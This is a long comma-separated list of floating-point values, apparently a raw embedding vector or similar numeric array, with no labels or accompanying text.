-0.012213168665766716, -0.02680005505681038, -0.02987823449075222, 0.0041654943488538265, 0.011792024597525597, -0.0036850078031420708, -0.0022358903661370277, -0.0062712132930755615, 0.0008288874523714185, 0.011286651715636253, -0.000602044106926769, -0.012818084098398685, 0.020061755552887917, 0.006409042049199343, 0.017152035608887672, -0.0017688036896288395, 0.009732249192893505, -0.0053714970126748085, 0.005084353499114513, 0.034304071217775345, 0.014395458623766899, 0.018591580912470818, 0.011883910745382309, 0.019862670451402664, -0.0058768694289028645, 0.018836610019207, -0.011401509866118431, 0.0021593188866972923, -0.025865882635116577, 0.0025211195461452007, -0.01185328233987093, 0.001573546091094613, 0.011631224304437637, 0.009326419793069363, -0.028714345768094063, -0.003558664582669735, 0.00039099366404116154, -0.011922196485102177, -0.002995863324031234, 0.0010796594433486462, 0.00045464379945769906, -0.013308142311871052, -0.002882920205593109, -0.0328645259141922, 0.005984069779515266, 0.014571573585271835, 0.0018721753731369972, 0.007940473966300488, -0.024502908810973167, 0.00491972453892231, 0.010421393439173698, 0.019127583131194115, 0.013246884569525719, -0.009219218976795673, -0.021378787234425545, 0.012596026062965393, -0.006749785505235195, -0.004391380585730076, -0.002597691025584936, 0.014249972999095917, 0.002710634144023061, 0.021179702132940292, -0.014380143955349922, -0.009755220264196396, -0.008361617103219032, 0.010505622252821922, -0.010972708463668823, 0.00031896852306090295, 0.01044436451047659, 0.01203705370426178, -0.011493395082652569, -0.009402991272509098, -0.014089172706007957, -0.01909695379436016, 0.008491788990795612, 0.0042305802926421165, 0.01684574969112873, -0.011347909457981586, -0.021792273968458176, 0.005922812502831221, 0.006401384714990854, -0.008759790100157261, 0.002758491551503539, -0.00019178789807483554, 0.01941855438053608, 0.010612822137773037, 0.002955663250759244, 0.02208324521780014, 0.019081639125943184, 0.017703350633382797, 0.016830435022711754, 0.004180808551609516, 0.012082996778190136, 0.0041425228118896484, -0.005019267555326223, -0.017810551449656487, 0.014740031212568283, -0.002134433016180992, 0.010942080058157444, -0.016769178211688995, 0.0005762011860497296, 0.007722244597971439, -0.02166976034641266, -0.0018606896046549082, -0.002546005416661501, 0.030950235202908516, -0.0011734595755115151, -0.02150130271911621, -0.01727455109357834, -0.005252811126410961, -0.020291471853852272, 0.02062838524580002, -0.016861064359545708, -0.01946449838578701, -0.001878875307738781, -0.007033100351691246, 0.02151661552488804, -0.03197629377245903, -0.007932816632091999, -0.004016179591417313, -0.02427319437265396, -0.02877560257911682, -0.007010128814727068, -0.006336298771202564, 0.020123014226555824, 0.0014424172695726156, 0.02589651197195053, -0.0016874463763087988, -0.010344821959733963, -0.013009512796998024, 0.014311229810118675, 0.0553765743970871, -0.004575152415782213, -0.005976412445306778, -0.014135114848613739, -0.006443499121814966, -0.01111819501966238, 0.005340868141502142, 0.0028542059008032084, 0.002766148652881384, 0.006336298771202564, 0.008844018913805485, -0.003453378565609455, -0.01649351976811886, -0.0343347005546093, 0.005547611508518457, 0.017488950863480568, -0.006745956838130951, 0.003338521346449852, 0.0077031017281115055, -0.004552180878818035, -0.006152526941150427, -0.020383356139063835, 0.004360752180218697, 0.006818700116127729, 0.02076621539890766, 0.01591157540678978, 0.010942080058157444, 0.012358654290437698, -0.01452563051134348, 0.014977402985095978, -0.024058792740106583, 0.007002471946179867, 0.0020884901750832796, -0.01525306049734354, 0.0028599489014595747, -0.02407410740852356, 0.01044436451047659, 0.025758681818842888, -0.025605538859963417, 0.0038381507620215416, 0.00245220516808331, -0.01493911724537611, 0.008024702779948711, -0.004310980439186096, 0.009311105124652386, 0.00869087502360344, -0.009617391973733902, 0.015475117601454258, 0.00926516205072403, -0.005275782663375139, -0.022619247436523438, -0.012948255985975266, 0.004640238359570503, 0.01915821060538292, 0.029127832502126694, 0.0006164012593217194, -0.0240128505975008, -0.008989504538476467, 0.0024005193263292313, 0.010360135696828365, -0.0039051510393619537, 0.008422874845564365, 0.019816726446151733, 0.011600595898926258, -0.0031643209513276815, 0.04291071742773056, -0.009173275902867317, 0.00037950792466290295, -0.003918550908565521, -0.018928496167063713, -0.010628136806190014, -0.0025804624892771244, -0.007213043514639139, 0.0012634311569854617, 0.010298878885805607, -0.01318562775850296, -0.004513895139098167, 0.001320859882980585, -0.006960357539355755, -0.011401509866118431, -0.005708411801606417, -0.01248116884380579, -0.0035988646559417248, -0.004651723895221949, 0.0018243180820718408, 0.0006623442168347538, 0.005593554582446814, 0.0006857942789793015, -0.0025957769248634577, -0.0483626164495945, -0.014946773648262024, 0.0021688903216272593, -0.004858467262238264, -0.00433012330904603, 0.013706314377486706, -0.008040016517043114, -0.01009979285299778, 0.01595751941204071, -0.0024120050948113203, 0.00726281525567174, -0.0012442882871255279, 0.0035644073504954576, 0.003614179091528058, -0.009793506003916264, 0.02045992761850357, -0.013453627936542034, -0.007469558622688055, 0.0010174449998885393, 0.01159293856471777, 0.02072027139365673, 0.0026225768961012363, -0.006516242399811745, 0.016309747472405434, -0.004150180146098137, -0.009020132943987846, 0.020490556955337524, -0.005398297216743231, -0.010237621143460274, 0.0012634311569854617, 0.007492530159652233, -0.016248490661382675, -0.020704956725239754, -0.01569717563688755, 0.0005235582357272506, 0.011133508756756783, 0.028591830283403397, 0.029648518189787865, -0.009387676604092121, -0.00002711411980271805, 0.004483266733586788, 0.011470424011349678, -0.022588618099689484, -0.023767821490764618, -0.003866865299642086, 0.04903644695878029, 0.024671366438269615, -0.009219218976795673, -0.019112268462777138, 0.0013677600072696805, 0.007837101817131042, -0.01277214102447033, 0.01467877347022295, -0.01480894535779953, 0.015574661083519459, 0.001530474633909762, 0.008101274259388447, -0.01069705095142126, 0.00879041850566864, -0.0057275546714663506, 0.00923453364521265, -0.020123014226555824, -0.011233052238821983, 0.0061410414054989815, -0.012542426586151123, 0.008254417218267918, 0.005608868785202503, 0.016937635838985443, 0.02281833253800869, 0.015053974464535713, 0.00741595821455121, 0.005788811948150396, -0.016141291707754135, -0.000533608254045248, -0.01185328233987093, -0.02186884544789791, 0.008468817919492722, 0.023308390751481056, -0.0013534028548747301, -0.0006465513724833727, -0.012243797071278095, 0.013721629045903683, -0.012948255985975266, -0.00009260376828024164, -0.0031030636746436357, 0.02145535871386528, 0.010291221551597118, 0.019219469279050827, 0.011546995490789413, 0.026754112914204597, -0.012128939852118492, -0.003378721419721842, 0.026049654930830002, 0.0053064110688865185, -0.012335683219134808, -0.002479005139321089, -0.0005781155196018517, -0.008285045623779297, 0.0043377806432545185, -0.009272819384932518, -0.005310239735990763, 0.006968014407902956, -0.009433619678020477, -0.0024981480091810226, 0.0062712132930755615, -0.004743610043078661, -0.025360509753227234, -0.01041373610496521, 0.01381351426243782, 0.014740031212568283, 0.027979258447885513, -0.00274700578302145, 0.014227000996470451, 0.010804250836372375, 0.0014309316175058484, -0.011355566792190075, 0.013017170131206512, -0.0065392134711146355, 0.010658765211701393, 0.02052118629217148, -0.005589725915342569, 0.0078103020787239075, 0.023890335112810135, 0.03494727239012718, -0.0054786973632872105, 0.011646538972854614, 0.003794122254475951, -0.009027790278196335, -0.0164322629570961, -0.012328025884926319, -0.01323922723531723, 0.0007604515994898975, -0.015972834080457687, -0.004452637862414122, -0.014035572297871113, -0.005949612241238356, 0.004307151772081852, -0.011110537685453892, -0.010911451652646065, -0.005176239181309938, -0.014793630689382553, -0.006194641347974539, -0.01946449838578701, -0.0023813764564692974, 0.016723234206438065, -0.007500187028199434, -0.011210080236196518, 0.023354334756731987, 0.0029307776130735874, 0.0003591685963328928, -0.017443008720874786, -0.0020157471299171448, -0.02375250682234764, -0.012596026062965393, -0.016187233850359917, 0.010107449255883694, -0.0054940115660429, -0.010865508578717709, 0.00970927719026804, 0.010689393617212772, 0.0010576450731605291, 0.014035572297871113, -0.019556384533643723, -0.00047857241588644683, -0.010942080058157444, 0.0069718430750072, 0.019847355782985687, 0.020704956725239754, -0.015452146530151367, -0.010000249370932579, -0.007515501230955124, -0.012113625183701515, -0.005394468549638987, -0.015789061784744263, 0.012603683397173882, 0.0018673896556720138, 0.005616526119410992, -0.0022760904394090176, 0.020858101546764374, 0.007442758418619633, -0.010030877776443958, -0.01905101165175438, -0.02385970763862133, -0.03491664305329323, 0.0169988926500082, 0.021731017157435417, -0.0071977293118834496, -0.0031088064424693584, -0.0031624066177755594, -0.015337289310991764, -0.010092135518789291, -0.0007006300147622824, 0.018821297213435173, -0.005934298038482666, -0.007362358272075653, -0.01799432374536991, -0.008330988697707653, -0.0044296663254499435, 0.016447577625513077, 0.0313943512737751, -0.0014826173428446054, -0.0016099176136776805, 0.00795578770339489, 0.00395109411329031, 0.0034782644361257553, 0.0030686063691973686, -0.0017975179944187403, -0.004245894495397806, 0.02238953299820423, 0.014096829108893871, 0.010367793031036854, 0.011608253233134747, 0.006661728024482727, 0.005425096955150366, 0.012726197950541973, -0.0048431530594825745, 0.012550082989037037, -0.0022952333092689514, -0.0017487036529928446, 0.017703350633382797, -0.005176239181309938, -0.02366062067449093, -0.018224038183689117, -0.011991110630333424, 0.011439795605838299, 0.007147957570850849, -0.003537607379257679, 0.0017161606810986996, -0.0007346086786128581, 0.005275782663375139, 0.0005680654430761933, 0.013024827465415001, -0.00021894687961321324, 0.0017008463619276881, -0.015398546122014523, -0.004762752912938595, -0.006891442928463221, 0.0028771774377673864, 0.02134815976023674, -0.028974689543247223, 0.004996296018362045, 0.004686181433498859, 0.0016970178112387657, -0.004513895139098167, -0.007017786148935556, -0.023675935342907906, 0.004115723073482513, 0.015727804973721504, -0.02088872902095318, -0.008430532179772854, -0.01690700650215149, 0.006309499032795429, 0.013392371125519276, 0.019602326676249504, -0.00606829859316349, 0.02883685939013958, -0.007404472678899765, -0.006968014407902956, 0.0020157471299171448, -0.020276157185435295, -0.016263805329799652, -0.0199392419308424, -0.009380019269883633, 0.027075713500380516, -0.03292578458786011, -0.023522792384028435, -0.01779523678123951, 0.004349266178905964, -0.008277388289570808, -0.0005374368629418314, 0.002429233631119132, -0.0025421767495572567, -0.01617191918194294, 0.006305670365691185, -0.0037098934408277273, -0.0061640129424631596, -0.018959125503897667, 0.02045992761850357, -0.014150429517030716, -0.00954847689718008, 0.016524149104952812, -0.006795728579163551, -0.015551690012216568, 0.002992034889757633, -0.002725948579609394, -0.00762653024867177, 0.004077436868101358, -0.023982221260666847, -0.013652713969349861, 0.008200816810131073, -0.002503891009837389, -0.007863902486860752, -0.004402866121381521, 0.02370656467974186, -0.014479687437415123, -0.016570091247558594, -0.016462892293930054, 0.005026924889534712, -0.0042305802926421165, 0.027290113270282745, -0.0015984319616109133, 0.014686430804431438, -0.012779798358678818, 0.018821297213435173, -0.023584049195051193, -0.0003223185194656253, -0.00762653024867177, -0.004192294552922249, 0.010536250658333302, -0.009762877598404884, -0.011845625005662441, 0.0038592079654335976, 0.03565173223614693, 0.002429233631119132, -0.003847722429782152, 0.001901846844702959, 0.0028120914939790964, -0.01467877347022295, -0.012488826178014278, 0.02977103367447853, -0.006286527495831251, -0.018928496167063713, 0.007308758329600096, -0.01433420181274414, 0.010329507291316986, -0.017152035608887672, -0.010406078770756721, 0.005455725826323032, -0.012565397657454014, -0.02500828169286251, -0.01900506764650345, -0.01732049323618412, -0.028423374518752098, -0.006420527584850788, -0.024104736745357513, 0.0049771531485021114, -0.0071326433680951595, -0.00215740455314517, 0.01768803782761097, 0.013338770717382431, 0.015352603048086166, -0.019495125859975815, 0.016141291707754135, 0.010352478362619877, 0.020659014582633972, -0.012649626471102238, -0.02327776327729225, -0.0311952643096447, 0.01611066237092018, -0.013116712681949139, -0.006435841787606478, -0.012848712503910065, -0.002727862913161516, 0.012128939852118492, 0.004655552562326193, -0.009249848313629627, 0.016891691833734512, -0.011952824890613556, -0.024058792740106583, -0.010781279765069485, -0.003200692357495427, 0.015230088494718075, -0.010750651359558105, 0.001468260190449655, 0.0032255782280117273, 0.010658765211701393, -0.008162531070411205, -0.0061410414054989815, 0.0036199218593537807, 0.03271138295531273, -0.0011055023642256856, -0.01952575519680977, 0.005471040029078722, -0.024533536285161972, 0.021547244861721992, 0.013805857859551907, 0.001521860365755856, 0.0025957769248634577, 0.0028561202343553305, 0.000016854723071446642, -0.01012276392430067, 0.009318762458860874, -0.0073049296624958515, 0.012588368728756905, 0.015199460089206696, -0.004533038008958101, -0.0025957769248634577, 0.015559346415102482, -0.0071326433680951595, 0.01909695379436016, 0.007978759706020355, -0.006895271595567465, -0.0011035880306735635, 0.013246884569525719, 0.01773397997021675, -0.023430906236171722, 0.005279610864818096, -0.011026308871805668, -0.017136720940470695, -0.010842536576092243, 0.000554665457457304, 0.0001471610157750547, 0.006638756953179836, 0.013063113205134869, -0.018821297213435173, -0.0011906882282346487, -0.0038611222989857197, -0.0057275546714663506, 0.01935729756951332, -0.005076696164906025, 0.00268191983923316, -0.01909695379436016, 0.00923453364521265, 0.009824134409427643, -0.004758924245834351, 0.012565397657454014, -0.0063401274383068085, -0.008262074552476406, -0.008277388289570808, 0.015276031568646431, -0.02212918922305107, -0.0036256646271795034, 0.0010318021522834897, -0.008147217333316803, -0.02537582442164421, 0.002484748139977455, -0.032006923109292984, 0.02454885095357895, 0.011340252123773098, -0.009916020557284355, -0.00047809386160224676, -0.021256273612380028, 0.005566754378378391, 0.02056712843477726, -0.04291071742773056, 0.017703350633382797, -0.021057186648249626, 0.0002004022098844871, 0.042206261307001114, 0.007695444859564304, 0.0007331729866564274, 0.012473511509597301, -0.008759790100157261, -0.007316415198147297, -0.0058998409658670425, -0.011715453118085861, 0.00047235097736120224, -0.0007681087590754032, 0.002220576163381338, -0.024824509397149086, -0.0008006516727618873, 0.00005940280243521556, -0.026968512684106827, 0.015429175458848476, 0.003378721419721842, -0.05473337322473526, 0.010643450543284416, -0.0006834014202468097, -0.0005470082978717983, -0.010429050773382187, 0.004915895871818066, -0.026417197659611702, -0.02459479495882988, 0.02108781598508358, 0.001362974289804697, -0.0033978642895817757, -0.003462950000539422, -0.0037768937181681395, 0.0009475733968429267, -0.01069705095142126, -0.0016127891140058637, 0.004425837658345699, 0.015084602870047092, -0.009586762636899948, -0.000015030165741336532, -0.019541069865226746, 0.023155247792601585, -0.02951068989932537, 0.02427319437265396, 0.0054786973632872105, 0.015138203278183937, 0.00004181526674074121, 0.0037654079496860504, -0.014617516659200191, 0.015505746938288212, -0.005811783485114574, 0.007285786792635918, -0.0001947789714904502, -0.016983577981591225, -0.010138078592717648, -0.02113375812768936, 0.003916636575013399, -0.015352603048086166, 0.000048156351112993434, 0.015926890075206757, -0.007672473322600126, -0.001521860365755856, 0.007886873558163643, 0.01727455109357834, 0.005222182255238295, -0.013223913498222828, -0.010559221729636192, 0.027504514902830124, 0.024610107764601707, -0.00993899255990982, 0.007285786792635918, -0.004938867408782244, -0.01525306049734354, -0.00777201633900404, -0.01056687906384468, 0.007806473411619663, -0.005153268110007048, 0.015926890075206757, 0.002894405974075198, 0.009012475609779358, 0.006956528872251511, 0.009402991272509098, -0.005275782663375139, 0.009602077305316925, 0.007213043514639139, 0.010742994025349617, 0.003072435036301613, 0.0036065217573195696, -0.013775228522717953, -0.014135114848613739, -0.011363224126398563, -0.02359936386346817, -0.016309747472405434, -0.0012404597364366055, -0.012082996778190136, -0.018515009433031082, -0.010681736283004284, -0.014770659618079662, 0.0077031017281115055, 0.02652439847588539, 0.011508709751069546, -0.018178094178438187, 0.010375450365245342, 0.006244413089007139, 0.002630233997479081, -0.01159293856471777, 0.013292827643454075, 0.03277264162898064, 0.027228856459259987, 0.0002275611914228648, -0.001213659648783505, -0.0006594728329218924, 0.003813265124335885, -0.004980981815606356, -0.004636409692466259, -0.0038592079654335976, 0.0054940115660429, -0.015023346059024334, 0.020919358357787132, 0.015015688724815845, 0.012412254698574543, 0.009716934524476528, -0.010949737392365932, -0.02114907279610634, 0.0013026741798967123, 0.007140300702303648, -0.0009183805086649954, -0.012603683397173882, -0.004701495636254549, 0.005191553849726915, -0.016677292063832283, 0.001658732071518898, -0.0020559472031891346, -0.014854888431727886, -0.016263805329799652, 0.014372487552464008, -0.0040736086666584015, 0.0002845113049261272, 0.005892183631658554, 0.00119355961214751, 0.0046938383020460606, 0.011294309049844742, 0.022680504247546196, 0.0029728920198976994, -0.0010203163838014007, -0.006968014407902956, 0.00032782211201265454, 0.00004360991079011001, 0.004437323659658432, -0.006523899268358946, -0.0026551198679953814, 0.008598989807069302, 0.006374584510922432, 0.0002907327434513718, 0.006807214114814997, -0.016937635838985443, 0.001415617298334837, 0.005268125329166651, -0.0009514020057395101, 0.01111819501966238, 0.004808695986866951, 0.03810202330350876, 0.01216722559183836, -0.0017085035797208548, -0.020015813410282135, 0.020659014582633972, 0.002377547789365053, -0.007193900644779205, 0.0002828362921718508, -0.016416948288679123, -0.0020961472764611244, 0.0004929295973852277, -0.0014491173205897212, -0.015069288201630116, 0.007044586353003979, 0.024502908810973167, -0.02366062067449093, 0.00790218822658062, -0.015230088494718075, -0.007243672385811806, 0.024717308580875397, 0.020659014582633972, 0.003357664216309786, -0.010520935989916325, 0.020475242286920547, -0.010781279765069485, 0.0048929243348538876, -0.0020042613614350557, 0.010742994025349617, -0.004433494992554188, 0.006137212738394737, -0.005566754378378391, 0.007124986499547958, -0.010191678069531918, 0.006500927731394768, 0.015896262601017952, -0.021639131009578705, -0.020475242286920547, -0.013384713791310787, -0.008269731886684895, 0.018407810479402542, -0.007381501141935587, 0.027397314086556435, -0.008262074552476406, 0.009816478006541729, 0.010138078592717648, -0.00395109411329031, 0.015291346237063408, 0.004885267466306686, -0.0010107449488714337, 0.0044066947884857655, -0.015490432269871235, 0.024656051769852638, 0.005191553849726915, -0.025835253298282623, -0.003908979706466198, -0.0074810441583395, 0.024426337331533432, 0.0030169205274432898, 0.017979009076952934, 0.0014003029791638255, -0.021103130653500557, -0.01464814506471157, -0.02814771607518196, -0.0104367071762681, 0.01483191642910242, 0.026600969955325127, 0.00879041850566864, 0.008935904130339622, -0.004770409781485796, -0.017596151679754257, 0.030582692474126816, -0.001247159787453711, -0.0067344713024795055, -0.0033308640122413635, -0.00770693039521575, 0.009180933237075806, 0.020031128078699112, -0.0008992375805974007, 0.03883710876107216, 0.011493395082652569, -0.019709527492523193, -0.022542675957083702, -0.02444165013730526, -0.012044711038470268, 0.02067432925105095, -0.015712490305304527, -0.00690675713121891, -0.033936526626348495, -0.027014456689357758, 0.02689194120466709, -0.00999259203672409, -0.01528368890285492, -0.0016204462153837085, 0.001962146954610944, 0.006454985123127699, -0.01331579964607954, 0.006458813324570656, -0.003524207277223468, 0.021210329607129097, -0.010612822137773037, -0.041318029165267944, 0.011539338156580925, 0.004690009634941816, 0.004085094202309847, 0.010873165912926197, -0.01222082506865263, 0.008208474144339561, 0.024411022663116455, 0.006964185740798712, 0.0028369773644953966, -0.028852174058556557, -0.04269631952047348, 0.018606895580887794, 0.0019832041580229998, 0.00007358050788752735, 0.006719157099723816, -0.003378721419721842, 0.004456466529518366, 0.0077681876718997955, -0.002992034889757633, 0.007565272971987724, 0.005685440264642239, -0.030383605509996414, -0.004663209896534681, 0.013017170131206512, -0.012305053882300854, 0.004483266733586788, -0.021547244861721992, -0.01998518407344818, -0.0044296663254499435, -0.004368409048765898, 0.009303447790443897, 0.01606471836566925, 0.009372362866997719, -0.0030245776288211346, -0.029189089313149452, -0.005784983281046152, 0.0003730471944436431, -0.0009284305269829929, -0.01499271672219038, 0.00039601867320016026, 0.009977278299629688, 0.026493769139051437, 0.0019698040559887886, -0.008200816810131073, 0.002166975988075137, 0.0035012359730899334, 0.02052118629217148, -0.016080033034086227, 0.010390764102339745, -0.013645056635141373, 0.007324072532355785, 0.015069288201630116, -0.012864027172327042, 0.000797780230641365, 0.011975796893239021, -0.0025708910543471575, -0.02245078980922699, 0.004755095578730106, -0.00866024661809206, -0.0034591215662658215, -0.009977278299629688, 0.006922071799635887, -0.007312586531043053, -0.0027508342172950506, 0.0023507478181272745, 0.008866989985108376, 0.02113375812768936, 0.014027914963662624, 0.010206992737948895, 0.006278870161622763, 0.006309499032795429, 0.027764858677983284, -0.0028140058275312185, 0.012282082810997963, 0.0062980130314826965, -0.01649351976811886, 0.008553046733140945, -0.02019958570599556, 0.02312462031841278, 0.018300609663128853, -0.007714587729424238, 0.007664815988391638, 0.020858101546764374, -0.006466470658779144, 0.00980882067233324, 0.004303323104977608, 0.015727804973721504, -0.0026972342748194933, 0.01143213827162981, 0.018698781728744507, -0.0021363473497331142, 0.00001875405723694712, 0.01810152269899845, 0.006240584421902895, 0.016815120354294777, 0.0025613196194171906, -0.005995555315166712, 0.004571323748677969, 0.015880947932600975, 0.006960357539355755, -0.012756826356053352, 0.012396940030157566, 0.000903066189493984, -0.005367668345570564, -0.010214650072157383, -0.02762702852487564, -0.00504989642649889, 0.007764359004795551, -0.03176189586520195, 0.02554428204894066, 0.011661852709949017, 0.013491913676261902, 0.005482525564730167, -0.0014606030890718102, 0.005846240557730198, 0.013668028637766838, 0.006217612884938717, -0.023783136159181595, -0.011125851422548294, -0.015896262601017952, 0.003319378476589918, 0.006263555958867073, -0.013132027350366116, -0.007144129369407892, -0.016248490661382675, -0.012174882926046848, -0.0083999028429389, 0.0007216872181743383, -0.0018817468080669641, 0.008047673851251602, 0.027596401050686836, -0.001910461112856865, 0.016876379027962685, 0.011087565682828426, -0.012527111917734146, -0.006190813146531582, -0.014487344771623611, 0.016600720584392548, -0.0013342599850147963, -0.013124370016157627, -0.015942204743623734, 0.024150678887963295, -0.010750651359558105, 0.0026225768961012363, 0.0016625606222078204, -0.019801413640379906, 0.015360260382294655, 0.013154999352991581, -0.010306536220014095, -0.008775103837251663, 0.0013007598463445902, -0.002480919472873211, -0.000047946974518708885, 0.016080033034086227, -0.0036390647292137146, 0.00470915250480175, 0.008101274259388447, 0.004701495636254549, -0.005176239181309938, 0.001987032825127244, 0.023476848378777504, -0.017090778797864914, -0.0069986432790756226, -0.017887122929096222, -0.004548352211713791, -0.011715453118085861, 0.0018453752854838967, -0.01340002752840519, 0.02004644274711609, -0.006895271595567465, 0.026294684037566185, 0.0010251021012663841, 0.0005570583161897957, -0.012144253589212894, 0.00015410031483042985, -0.0169988926500082, -0.026493769139051437, 0.0022569475695490837, -0.018300609663128853, -0.0022435474675148726, 0.005957269575446844, -0.0019698040559887886, -0.011960482224822044, -0.02857651747763157, -0.006190813146531582, 0.011164137162268162, -0.011447452940046787, 0.0014338030014187098, 0.016049405559897423, 0.030184520408511162, 0.033354584127664566, 0.007450415752828121, 0.0057045831345021725, -0.010390764102339745, 0.01894381083548069, -0.009349390864372253, -0.00837693177163601, -0.025207366794347763, 0.0029116347432136536, 0.0003981722693424672, 0.008422874845564365, 0.023247133940458298, 0.0021593188866972923, -0.011079909279942513, 0.004582809749990702, 0.001816660980693996, 0.00614869873970747, 0.004690009634941816, 0.008614303544163704, 0.003325121244415641, 0.009112019091844559, -0.0064473277889192104, 0.003977893851697445, -0.013193285092711449, -0.014020257629454136, 0.00563949765637517, 0.011156480759382248, -0.005624182987958193, 0.023691250011324883, 0.017657408490777016, 0.011010994203388691, 0.0004079829959664494, 0.0010212735505774617, -0.001900889677926898, 0.000266804127022624, 0.0078103020787239075, 0.0070407576858997345, 0.01156231015920639, 0.016922321170568466, -0.007775845006108284, -0.018867239356040955, 0.01056687906384468, 0.017289863899350166, -0.009900706820189953, 0.005088182166218758, 0.001226102584041655, -0.004770409781485796, 0.007710759062319994, -0.013721629045903683, 0.017029521986842155, 0.011577623896300793, -0.0027833771891891956, -0.011286651715636253, -0.009295790456235409, 0.01509991753846407, 0.028928745537996292, 0.003562493249773979, -0.015191802754998207, -0.006489442195743322, -0.0030035206582397223, 0.00923453364521265, -0.031011493876576424, 0.004980981815606356, 0.011585281230509281, 0.014755344949662685, 0.011883910745382309, 0.00012921456072945148, -0.0011524023720994592, 0.004609609488397837, 0.00868321768939495, -0.007090528961271048, 0.007232186384499073, 0.030950235202908516, -0.02045992761850357, -0.008300360292196274, 0.005735212005674839, -0.01863752491772175, -0.0019717183895409107, 0.01467877347022295, 0.0015065460465848446, -0.005716069135814905, -0.0028676060028374195, -0.014694088138639927, -0.03160875290632248, -0.0012060025474056602, -0.003696493338793516, 0.002674262737855315, -0.016891691833734512, -0.019479811191558838, -0.0094183050096035, -0.025253310799598694, -0.014050886034965515, 0.00837693177163601, 0.00006993139686528593, -0.003189206589013338, -0.011386195197701454, -0.010972708463668823, -0.0007379587041214108, 0.0011437881039455533, 0.015658888965845108, -0.00011736989108612761, -0.005957269575446844, 0.00238711922429502, -0.033722128719091415, 0.002716377144679427, 0.005991726648062468, -0.0006403299048542976, -0.01627911999821663, 0.01185328233987093, -0.001614703331142664, -0.0054365829564630985, -0.0036926649045199156, -0.01420402992516756, 0.020000498741865158, -0.011608253233134747, 0.026555027812719345, 0.007258986588567495, 0.0008236231515184045, 0.021256273612380028, 0.004111894406378269, -0.0054786973632872105, -0.012994198128581047, -0.012848712503910065, 0.006500927731394768, 0.002953748917207122, 0.009471905417740345, -0.013913057744503021, -0.009043104946613312, -0.011845625005662441, 0.001531431800685823, 0.0005364796961657703, -0.01499271672219038, -0.006531556602567434, -0.005019267555326223, 0.010612822137773037, -0.005222182255238295, -0.011401509866118431, 0.024671366438269615, 0.01441842969506979, 0.023093990981578827, 0.00926516205072403, -0.016401633620262146, 0.022833647206425667, -0.006994814611971378, 0.0028484631329774857, -0.022542675957083702, -0.019326668232679367, -0.03454910218715668, -0.012305053882300854, 0.005792640615254641, 0.006627270951867104, -0.022159818559885025, 0.011439795605838299, -0.006409042049199343, -0.0034131784923374653, 0.018147466704249382, 0.00446029519662261, 0.01216722559183836, -0.003750093514099717, -0.0164322629570961, 0.01606471836566925, 0.018499696627259254, 0.01083488017320633, 0.025391139090061188, -0.023048048838973045, -0.002463690936565399, -0.012534769251942635, -0.01710609346628189, 0.00853007473051548, -0.004575152415782213, -0.018515009433031082, 0.014923802576959133, -0.03709127753973007, -0.01989329792559147, 0.0034016927238553762, 0.012366311624646187, 0.0034552928991615772, 0.01451797317713499, -0.006171669811010361, -0.006454985123127699, -0.027274800464510918, 0.01512288860976696, 0.008614303544163704, 0.01935729756951332, -0.01467877347022295, 0.007871558889746666, 0.028744975104928017, -0.0015170746482908726, -0.003464864334091544, 0.054763998836278915, 0.011715453118085861, -0.002480919472873211, 0.02909720316529274, 0.0015754604246467352, 0.024625422433018684, -0.017305178567767143, -0.02366062067449093, -0.0062750414945185184, 0.006301841698586941, 0.007592073176056147, -0.011983453296124935, 0.0011811167933046818, -0.006925900001078844, -0.00866024661809206, 0.011899224482476711, -0.007676301524043083, 0.004081265535205603, -0.0134765999391675, -0.018407810479402542, -0.01493911724537611, -0.02480919472873211, 0.011814995668828487, -0.013491913676261902, -0.0037213792093098164, 0.015505746938288212, -0.005248982459306717, -0.0009360876865684986, 0.005256639327853918, -0.004793381318449974, 0.03908213973045349, -0.01143213827162981, -0.013637400232255459, -0.00638224184513092, 0.007714587729424238, 0.018913181498646736, 0.015582318417727947, 0.012978884391486645, -0.0031949495896697044, -0.016034090891480446, -0.006818700116127729, 0.008752132765948772, -0.005168582312762737, 0.0015984319616109133, 0.007737558800727129, -0.0011418737703934312, -0.001383074326440692, -0.0004893402801826596, 0.008958876132965088, 0.031424980610609055, 0.011087565682828426, 0.011439795605838299, 0.0024541195016354322, 0.008621960878372192, 0.01601877622306347, -0.0023162905126810074, -0.00831567496061325, -0.0034208358265459538, -0.002323947614058852, -0.011937510222196579, -0.006091269664466381, -0.015743117779493332, -0.025391139090061188, 0.012435225769877434, -0.01336939912289381, -0.009089047089219093, 0.0036486361641436815, 0.01515351701527834, -0.011814995668828487, 0.02877560257911682, -0.006925900001078844, -0.013001855462789536, 0.00923453364521265, 0.009824134409427643, -0.019479811191558838, -0.03375275805592537, 0.005210696719586849, 0.004682352766394615, 0.008308017626404762, -0.010796594433486462, 0.0018444181187078357, -0.017029521986842155, 0.001235674018971622, -0.008292702957987785, 0.0014960174448788166, -0.02370656467974186, -0.00536383967846632, -0.006198470015078783, -0.012932941317558289, 0.02872966043651104, 0.012266768142580986, 0.006378413178026676, -0.023829078301787376, 0.0008532946230843663, 0.0006920157466083765, -0.008177845738828182, -0.006432013586163521, -0.013652713969349861, -0.004533038008958101, 0.0007882087957113981, 0.006010869517922401, 0.016248490661382675, -0.025865882635116577, -0.004238237626850605, 0.027657657861709595, 0.006160184275358915, -0.0064626419916749, -0.02292553335428238, -0.01493911724537611, 0.019801413640379906, 0.004414352122694254, 0.0023105477448552847, -0.0347328707575798, 0.0020750900730490685, 0.021685073152184486, -0.0028216629289090633, -0.00018329324666410685, -0.000728387210983783, 0.018545638769865036, 0.005425096955150366, -0.0002026754227699712, -0.0010385022033005953, 0.036233674734830856, 0.0199392419308424, 0.006876128725707531, 0.0027642343193292618, 0.004850809928029776, 0.031225893646478653, 0.0002689576940611005, 0.011899224482476711, 0.017749294638633728, -0.03470224514603615, 0.013645056635141373, 0.01773397997021675, 0.012213168665766716, 0.007209214847534895, -0.010689393617212772, 0.01747363619506359, 0.01695295050740242, 0.0009112018742598593, -0.001921946881338954, 0.06615785509347916, 0.0017266892828047276, 0.0016529891872778535, -0.006902928929775953, 0.009311105124652386, 0.021577874198555946, 0.021378787234425545, 0.003748179180547595, -0.02706039883196354, 0.01957169733941555, 0.015743117779493332, 0.015605289489030838, 0.008491788990795612, -0.0015285603003576398, 0.0012548168888315558, 0.02271113358438015, 0.01831592433154583, -0.0034801787696778774, 0.008116587996482849, -0.008621960878372192, 0.0025747197214514017, 0.005486354231834412, 0.01321625616401434, 0.003518464509397745, 0.015789061784744263, -0.0028810061048716307, -0.017856493592262268, 0.020184271037578583, -0.008989504538476467, -0.026279369369149208, -0.009479562751948833, -0.00732790119946003, -0.0017496608197689056, 0.015896262601017952, 